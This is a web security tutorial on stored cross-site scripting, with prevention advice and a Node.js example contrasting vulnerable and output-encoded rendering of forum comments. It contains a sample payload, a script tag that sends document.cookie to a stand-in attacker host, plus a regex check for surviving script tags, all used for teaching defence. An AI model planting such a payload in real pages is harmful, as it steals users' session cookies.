Cross-Site Scripting - Stored XSS

In a stored XSS attack, the attacker's JavaScript is stored persistently on the target server (for example as a forum post or comment) and executes in the browser of every user who views the page that renders it, without the attacker needing to trick each victim individually. It is one of the most dangerous web vulnerabilities.

Prevention
HTML-encode all user-supplied data at output time, in the context where it is rendered
Send a Content-Security-Policy header that disallows inline script
Mark session cookies HttpOnly so page scripts cannot read them via document.cookie
Validate input on the server (length, character set, expected format) as a second layer, not as the only defense
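The following is an added example, not code from this page's demo, showing how the first three prevention items apply to a server that renders stored forum comments. It assumes a Node.js environment; the function names, the header values and the sample comment are all constructed for illustration, and the comment deliberately mirrors the shape of the demo's payload so the difference between the vulnerable and hardened renderers is visible.

```javascript
// Added example (not from the original page): rendering a stored comment
// safely. STORED_COMMENT is a constructed sample shaped like the demo's
// payload; the server must treat it as data, never as markup.

// HTML-encode the five characters that can break out of an HTML text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Vulnerable rendering: stored text is concatenated straight into the page,
// so a <script> tag inside the comment runs in every reader's browser.
function renderCommentVulnerable(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Hardened rendering: the same text is encoded at output time, so the browser
// displays the angle brackets as literal characters instead of parsing a tag.
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Defense in depth, set on every HTML response (values are illustrative):
// - a CSP without 'unsafe-inline' blocks inline <script> even if encoding is
//   missed somewhere;
// - HttpOnly keeps document.cookie empty for page scripts, so a cookie-stealing
//   payload like the one in the demo has nothing to read.
function securityHeaders() {
  return {
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
    'Set-Cookie': 'session=PLACEHOLDER_SESSION_ID; HttpOnly; Secure; SameSite=Lax',
    'Content-Type': 'text/html; charset=utf-8',
  };
}

// Constructed sample comment in the shape of the demo's payload.
const STORED_COMMENT =
  "<script>fetch('https://collect.evil.com/steal?c='+document.cookie)</script>";

// A simple check to run over rendered output in a test suite: does any raw
// <script tag survive? The safe renderer must never produce one.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderCommentVulnerable(STORED_COMMENT)); // raw tag, would execute
  console.log(renderCommentSafe(STORED_COMMENT));       // encoded, inert text
  console.log(securityHeaders());
}
```

Encoding at output time rather than at input time is the important design choice: the same stored string may later be placed into HTML, a JavaScript string or a URL, and each context needs its own encoder, so storing pre-encoded data breaks as soon as a second context appears. The CSP and HttpOnly headers are there for the case where a template somewhere forgets to encode; they limit the damage rather than prevent the injection.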